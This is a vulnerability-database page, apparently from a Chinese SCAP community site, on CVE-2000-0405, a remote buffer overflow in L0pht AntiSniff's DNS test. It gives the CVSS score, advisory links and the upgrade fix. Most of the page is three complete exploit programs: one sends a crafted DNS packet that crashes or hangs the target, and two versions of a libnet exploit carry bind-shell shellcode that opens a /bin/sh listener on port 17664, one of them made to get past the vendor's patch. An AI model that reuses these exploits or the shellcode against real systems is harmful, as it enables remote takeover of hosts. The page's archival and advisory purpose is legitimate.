CVE-2000-0405
CVSS10.0
发布时间 :2000-05-16 00:00:00
修订时间 :2008-09-10 15:04:35
NMCOE    

[原文]Buffer overflow in L0pht AntiSniff allows remote attackers to execute arbitrary commands via a malformed DNS response packet.


[CNNVD]AntiSniff DNS缓冲区溢出漏洞。(CNNVD-200005-060)

        L0pht AntiSniff 存在缓冲区溢出漏洞,远程攻击者可以通过异常DNS响应包执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:atstake:antisniff:1.0::researchers
cpe:/a:atstake:antisniff:1.0.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0405
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0405
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-060
(官方数据源) CNNVD

- 其它链接及资源

http://www.l0pht.com/advisories/asniff_advisory.txt
(VENDOR_ADVISORY)  L0PHT  20000515 AntiSniff version 1.01 and Researchers version 1 DNS overflow
http://www.securityfocus.com/bid/1207
(UNKNOWN)  BID  1207
http://www.osvdb.org/3179
(UNKNOWN)  OSVDB  3179

- 漏洞信息

AntiSniff DNS缓冲区溢出漏洞。
危急 缓冲区溢出
2000-05-16 00:00:00 2005-05-02 00:00:00
远程※本地  
        L0pht AntiSniff 存在缓冲区溢出漏洞,远程攻击者可以通过异常DNS响应包执行任意命令。

- 公告与补丁

        Immediate Solution:
        Do not run the DNS tests on AntiSniff version 1.01 or the Researchers version 1.0. Download the newer version from
        http://www.l0pht.com/antisniff which are labeled AntiSniff version 1.02 for the commercial instance and AntiSniff version 1-1 for the researchers instance.
        @Stake AntiSniff - Researchers Version 1.0
        
        @Stake AntiSniff 1.0.1
        

- 漏洞信息 (19916)

Stake AntiSniff 1.0.1/Researchers Version 1.0 DNS Overflow Vulnerability (1) (EDBID:19916)
multiple remote
2000-05-16 Verified
0 Hugo Breton
N/A [点击下载]
source: http://www.securityfocus.com/bid/1207/info

Certain versions of @Stake Inc.'s Antisniffer software contain a remotely exploitable buffer overflow. AntiSniff is a program that was released by L0pht Heavy Industries in July of 1999. It attempts, through a number of tests, to determine if a machine on a local network segment is listening to traffic that is not directed to it (commonly referred to as sniffing). During one particular test there is a problem if a packet that does not adhere to DNS specifications is sent to the AntiSniff machine. This can result in a buffer overflow on the system running AntiSniff. If the packet is crafted appropriately this overflow scenario can be exploited to execute arbitrary code on the system.

This scenario is only possible if AntiSniff is configured to run the DNS test and only during the time the test is running. Nonetheless, it is a vulnerability that should not be ignored and has even been found in other promiscuous mode detection programs as well.

NOTE: 

This information was taken verbatim from the L0pht advisory on the subject. This advisory is attached in full in the 'Credit' section of this advisory.

/* dnslong.c by Hugo Breton (bretonh@pgci.ca)

   This program must be run in the DNS test phase of Sentinel and Anti Sniff.
   It illustrates how code can be run remotely on a Win98 machine running Anti
   Sniff.

   Suggested arguments are:
   
   "dnslong host 5 65" to send the Windows 98 version of Anti Sniff in an
   infinite loop.
   "dnslong host 2 255" to segfault the oBSD version of Anti Sniff.
   "dnslong host 1 255" to segfault Sentinel.
*/


#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>

int main(int argc,char * * argv)
{
        char p[1024];
        int sock,i,j,k,len,labelnum,labellen;
        struct sockaddr_in sin;
        struct hostent * hoste;

        printf("dnslong.c by Hugo Breton (bretonh@pgci.ca)\n");

        if(argc<4)
        {
                printf("usage: %s host label_count label_length\n",argv[0]);
                return(0);
        }

        bzero((void *) &sin,sizeof(sin));
        sin.sin_family=AF_INET;
        sin.sin_port=htons(53);

        if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
        {
                if((hoste=gethostbyname(argv[1]))==NULL)
                {
                        printf("unknown host %s\n",argv[1]);
                        return(0);
                }
                
                bcopy(hoste->h_addr,&sin.sin_addr.s_addr,4);
        }

        labelnum=atoi(argv[2]);
        labellen=atoi(argv[3]);

        len=labelnum*(labellen+1)+5+12;

        if(len>1024)
        {
                printf("resulting packet will be too long\n");
                return(0);
        }

        bzero((void *) p,1024);
        * ((unsigned short *) (p+0))=htons(867-5309);
        * ((unsigned short *) (p+4))=htons(1);
        
        for(i=12,j=0;j<labelnum;j++)
        {
                * ((unsigned char *) (p+(i++)))=labellen;

                for(k=0;k<labellen;k++,i++)
                {
                        * ((unsigned char *) (p+i))=0x90;
                }
                
                * ((unsigned char *) (p+i-2))=0xeb; /* jmp $-2 */
                * ((unsigned char *) (p+i-1))=0xfe; /* just make it loop */
        }

        * ((unsigned char *) (p+269))=0x20;
        * ((unsigned char *) (p+270))=0xff;
        * ((unsigned char *) (p+271))=0x87; 
        * ((unsigned char *) (p+272))=0x01; /* new EIP */

        * ((unsigned char *) (p+(i++)))=0;

        * ((unsigned short *) (p+i))=htons(1);
        * ((unsigned short *) (p+i+2))=htons(1);

        if((sock=socket(AF_INET,SOCK_DGRAM,0))==-1)
        {
                printf("unable to create UDP socket\n");
                return(0);
        }

        if(sendto(sock,p,len,0,(struct sockaddr *) &sin,sizeof(sin))==-1)
        {
                printf("unable to send packet\n");
                return(0);
        }

        printf("packet sent to host %s\n",argv[1]);

        return(0);
}		

- 漏洞信息 (19917)

Stake AntiSniff 1.0.1/Researchers Version 1.0 DNS Overflow Vulnerability (2) (EDBID:19917)
multiple remote
2000-05-16 Verified
0 L0pht
N/A [点击下载]
source: http://www.securityfocus.com/bid/1207/info
 
Certain versions of @Stake Inc.'s Antisniffer software contain a remotely exploitable buffer overflow. AntiSniff is a program that was released by L0pht Heavy Industries in July of 1999. It attempts, through a number of tests, to determine if a machine on a local network segment is listening to traffic that is not directed to it (commonly referred to as sniffing). During one particular test there is a problem if a packet that does not adhere to DNS specifications is sent to the AntiSniff machine. This can result in a buffer overflow on the system running AntiSniff. If the packet is crafted appropriately this overflow scenario can be exploited to execute arbitrary code on the system.
 
This scenario is only possible if AntiSniff is configured to run the DNS test and only during the time the test is running. Nonetheless, it is a vulnerability that should not be ignored and has even been found in other promiscuous mode detection programs as well.
 
NOTE:
 
This information was taken verbatim from the L0pht advisory on the subject. This advisory is attached in full in the 'Credit' section of this advisory.

/* l0phtl0phe.c - antisniff exploit (1.02 included)
 *
 * -sc/teso
 *
 * gcc -o l0phtl0phe l0phtl0phe.c -Wall -lnet `libnet-config --defines`
 *
 * description:
 * l0pht messed up the fix for their problem in antisniff by not regarding
 * the type signedness properties of the char and int values used. this
 * results in a cool method bypassing the too extra checks (length + strncat).
 * some work on this topic have been done by mixter, (bad results on type
 * casting), but it should be obvious to any security conscious programmers.
 * i'm not stating that they aren't allowed errors, but they should fix it
 * for sure if they're going to fix it at all.  -sc.
 *
 * greetings to all teso, lam3rz, hert, adm, w00w00 and lds ppl.
 */

#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <arpa/nameser.h>
#include <libnet.h>


#define	OFFSET		0xbffef9a0

unsigned int	build_xp (unsigned char *xp);


int
main (int argc, char *argv[])
{
	int		sock;		/* raw socket */
	u_long		src_ip,
			dst_ip;

	unsigned char	xpbuf[512];	/* this one gets complicated now */
	unsigned char	tpack[512];	/* paket buffer */
	unsigned int	pl_len;


	if (argc != 3) {
		printf ("usage: %s <source ip> <dest ip>\n\n", argv[0]);

		exit (EXIT_FAILURE);
	}

	sock = libnet_open_raw_sock (IPPROTO_RAW);
	if (sock == -1) {
		perror ("libnet_open_raw_sock");
		exit (EXIT_FAILURE);
	}

	src_ip  = libnet_name_resolve (argv[1], 0);
	dst_ip  = libnet_name_resolve (argv[2], 0);

	pl_len = build_xp (xpbuf);

	libnet_build_ip (UDP_H + DNS_H + pl_len, 0, 7350, 0, 2, IPPROTO_UDP,
		src_ip, dst_ip, NULL, 0, tpack);
	libnet_build_udp (libnet_get_prand (PRu16), 53, NULL, 0,
		tpack + IP_H);
	libnet_build_dns (libnet_get_prand (PRu16), 0x0000, 1, 0, 0, 0,
		xpbuf, pl_len, tpack + IP_H + UDP_H);
	libnet_do_checksum (tpack, IPPROTO_UDP, UDP_H + DNS_H + pl_len);

	/* they use "udp and dst port 53" as bpf, so we should have no problem
	 */
	libnet_write_ip (sock, tpack, UDP_H + IP_H + DNS_H + pl_len);
	libnet_close_raw_sock (sock);

	printf ("exploitation succeeded.\n");
	printf ("try: \"telnet %s 17664\" now.\n", argv[2]);

	exit (EXIT_SUCCESS);
}


/* build_xp
 *
 * build exploit buffer into buffer pointed to by `xp'.
 */

unsigned int
build_xp (unsigned char *xp)
{




	/* yea yea ugly buffer ;-) */
	unsigned char	buf[] =
		"\x7c\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\xeb\x01"
		"\x7d\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\xeb\x08\x00"
		"\xfe\x10\x10\xff\xbf\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\xeb\x20"
		"\x90\x90\x90\x90"
		"\x3c\xf8\xfe\xbf\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

		/* portshell 17644 portshellcode by smiler & scut */
		"\x31\xc0\xb0\x02\xcd\x80\x09\xc0\x74\x06\x31\xc0"
		"\xfe\xc0\xcd\x80\xeb\x76\x5f\x89\x4f\x10\xfe\xc1"
		"\x89\x4f\x0c\xfe\xc1\x89\x4f\x08\x8d\x4f\x08\xfe"
		"\xc3\xb0\x66\xcd\x80\xfe\xc3\xc6\x47\x10\x10\x66"
		"\x89\x5f\x14\x88\x47\x08\xb0\x45\x66\x89\x47\x16"
		"\x89\x57\x18\x8d\x4f\x14\x89\x4f\x0c\x8d\x4f\x08"
		"\xb0\x66\xcd\x80\x89\x5f\x0c\xfe\xc3\xfe\xc3\xb0"
		"\x66\xcd\x80\x89\x57\x0c\x89\x57\x10\xfe\xc3\xb0"
		"\x66\xcd\x80\x31\xc9\x88\xc3\xb0\x3f\xcd\x80\xfe"
		"\xc1\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\x31"
		"\xd2\x88\x57\x07\x89\x7f\x0c\x89\xfb\x8d\x4f\x0c"
		"\xb0\x0b\xcd\x80\x31\xc0\x99\x31\xdb\x31\xc9\xe8"
		"\x7e\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

	buf[287] = (OFFSET      ) & 0xff;
	buf[288] = (OFFSET >>  8) & 0xff;
	buf[289] = (OFFSET >> 16) & 0xff;
	buf[290] = (OFFSET >> 24) & 0xff;

	memcpy (xp, buf, sizeof (buf));

	return (sizeof (buf));;
}		

- 漏洞信息 (19918)

Stake AntiSniff 1.0.1/Researchers Version 1.0 DNS Overflow Vulnerability (3) (EDBID:19918)
multiple remote
2000-05-16 Verified
0 L0pht
N/A [点击下载]
source: http://www.securityfocus.com/bid/1207/info
  
Certain versions of @Stake Inc.'s Antisniffer software contain a remotely exploitable buffer overflow. AntiSniff is a program that was released by L0pht Heavy Industries in July of 1999. It attempts, through a number of tests, to determine if a machine on a local network segment is listening to traffic that is not directed to it (commonly referred to as sniffing). During one particular test there is a problem if a packet that does not adhere to DNS specifications is sent to the AntiSniff machine. This can result in a buffer overflow on the system running AntiSniff. If the packet is crafted appropriately this overflow scenario can be exploited to execute arbitrary code on the system.
  
This scenario is only possible if AntiSniff is configured to run the DNS test and only during the time the test is running. Nonetheless, it is a vulnerability that should not be ignored and has even been found in other promiscuous mode detection programs as well.
  
NOTE:
  
This information was taken verbatim from the L0pht advisory on the subject. This advisory is attached in full in the 'Credit' section of this advisory.



/* l0phtl0phe.c - antisniff exploit (1-1-1 "second fixed version" included)
 *
 * -scut/teso
 *
 * gcc -o l0phtl0phe l0phtl0phe.c -Wall -lnet `libnet-config --defines`
 *
 * description:
 * l0pht messed up the fix for their problem in antisniff by not regarding
 * the type signedness properties of the char and int values used. this
 * results in a cool method bypassing the too extra checks (length + strncat).
 * some work on this topic have been done by mixter, (bad results on type
 * casting), but it should be obvious to any security conscious programmers.
 * i'm not stating that they aren't allowed errors, but they should fix it
 * for sure if they're going to fix it at all.  -sc.
 *
 * 2nd version: script kiddie proof to avoid that "doesn't work" lamer claim.
 *
 * greetings to all teso, lam3rz, hert, adm, w00w00 and lsd ppl.
 */

#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <arpa/nameser.h>
#include <libnet.h>


#define	OFFSET		0xbffef9a0

unsigned int	build_xp (unsigned char *xp);


int
main (int argc, char *argv[])
{
	int		sock;		/* raw socket */
	u_long		src_ip,
			dst_ip;

	unsigned char	xpbuf[1024];	/* this one gets complicated now */
	unsigned char	tpack[2048];	/* paket buffer */
	unsigned int	pl_len;


	if (argc != 3) {
		printf ("usage: %s <source ip> <dest ip>\n\n", argv[0]);

		exit (EXIT_FAILURE);
	}

	sock = libnet_open_raw_sock (IPPROTO_RAW);
	if (sock == -1) {
		perror ("libnet_open_raw_sock");
		exit (EXIT_FAILURE);
	}

	src_ip  = libnet_name_resolve (argv[1], 0);
	dst_ip  = libnet_name_resolve (argv[2], 0);

	pl_len = build_xp (xpbuf);

	libnet_build_ip (UDP_H + DNS_H + pl_len, 0, 7350, 0, 2, IPPROTO_UDP,
		src_ip, dst_ip, NULL, 0, tpack);
	libnet_build_udp (libnet_get_prand (PRu16), 53, NULL, 0,
		tpack + IP_H);
	libnet_build_dns (libnet_get_prand (PRu16), 0x0000, 1, 0, 0, 0,
		xpbuf, pl_len, tpack + IP_H + UDP_H);
	libnet_do_checksum (tpack, IPPROTO_UDP, UDP_H + DNS_H + pl_len);

	/* they use "udp and dst port 53" as bpf, so we should have no problem
	 */
	libnet_write_ip (sock, tpack, UDP_H + IP_H + DNS_H + pl_len);
	libnet_close_raw_sock (sock);

	printf ("exploitation succeeded.\n");
	printf ("try: \"telnet %s 17664\" now.\n", argv[2]);

	exit (EXIT_SUCCESS);
}


/* build_xp
 *
 * build exploit buffer into buffer pointed to by `xp'.
 */

unsigned int
build_xp (unsigned char *xp)
{
	int		i;
	unsigned char	buf[1024];
	unsigned char	shellcode[] =
		/* portshell 17644 portshellcode by smiler & scut */
		"\x31\xc0\xb0\x02\xcd\x80\x09\xc0\x74\x06\x31\xc0"
		"\xfe\xc0\xcd\x80\xeb\x76\x5f\x89\x4f\x10\xfe\xc1"
		"\x89\x4f\x0c\xfe\xc1\x89\x4f\x08\x8d\x4f\x08\xfe"
		"\xc3\xb0\x66\xcd\x80\xfe\xc3\xc6\x47\x10\x10\x66"
		"\x89\x5f\x14\x88\x47\x08\xb0\x45\x66\x89\x47\x16"
		"\x89\x57\x18\x8d\x4f\x14\x89\x4f\x0c\x8d\x4f\x08"
		"\xb0\x66\xcd\x80\x89\x5f\x0c\xfe\xc3\xfe\xc3\xb0"
		"\x66\xcd\x80\x89\x57\x0c\x89\x57\x10\xfe\xc3\xb0"
		"\x66\xcd\x80\x31\xc9\x88\xc3\xb0\x3f\xcd\x80\xfe"
		"\xc1\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\x31"
		"\xd2\x88\x57\x07\x89\x7f\x0c\x89\xfb\x8d\x4f\x0c"
		"\xb0\x0b\xcd\x80\x31\xc0\x99\x31\xdb\x31\xc9\xe8"
		"\x7e\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

	unsigned char	head[] =
		"\x07-7350-\x00\xfe";

	memcpy (buf, head, 9);
	for (i = 9 ; i < (sizeof (buf) - strlen (shellcode)) ; ++i)
		buf[i] = '\x90';
	memcpy (buf + sizeof (buf) - strlen (shellcode), shellcode,
		strlen (shellcode));

	buf[272] = '\xeb';
	buf[273] = '\x08';
	buf[274] = (OFFSET      ) & 0xff;
	buf[275] = (OFFSET >>  8) & 0xff;
	buf[276] = (OFFSET >> 16) & 0xff;
	buf[277] = (OFFSET >> 24) & 0xff;

	memcpy (xp, buf, sizeof (buf));

	return (sizeof (buf));;
}










		

- 漏洞信息

3179
AntiSniff DNS Overflow Remote Code Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

AntiSniff contains a flaw that allows a remote attacker to execute arbitrary code on a vulnerable host. The flaw is due to one of the tests performed not properly validating input on incoming packets. A carefully crafted packet that does not adhere to DNS specifications can trigger a remote overflow and allow arbitrary code to be executed.

- 时间线

2000-05-15 Unknow
2000-05-15 Unknow

- 解决方案

Upgrade to version 1.02 or higher, as it has been reported to fix this vulnerability. Users may also install the vendor provided patch that mitigates this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站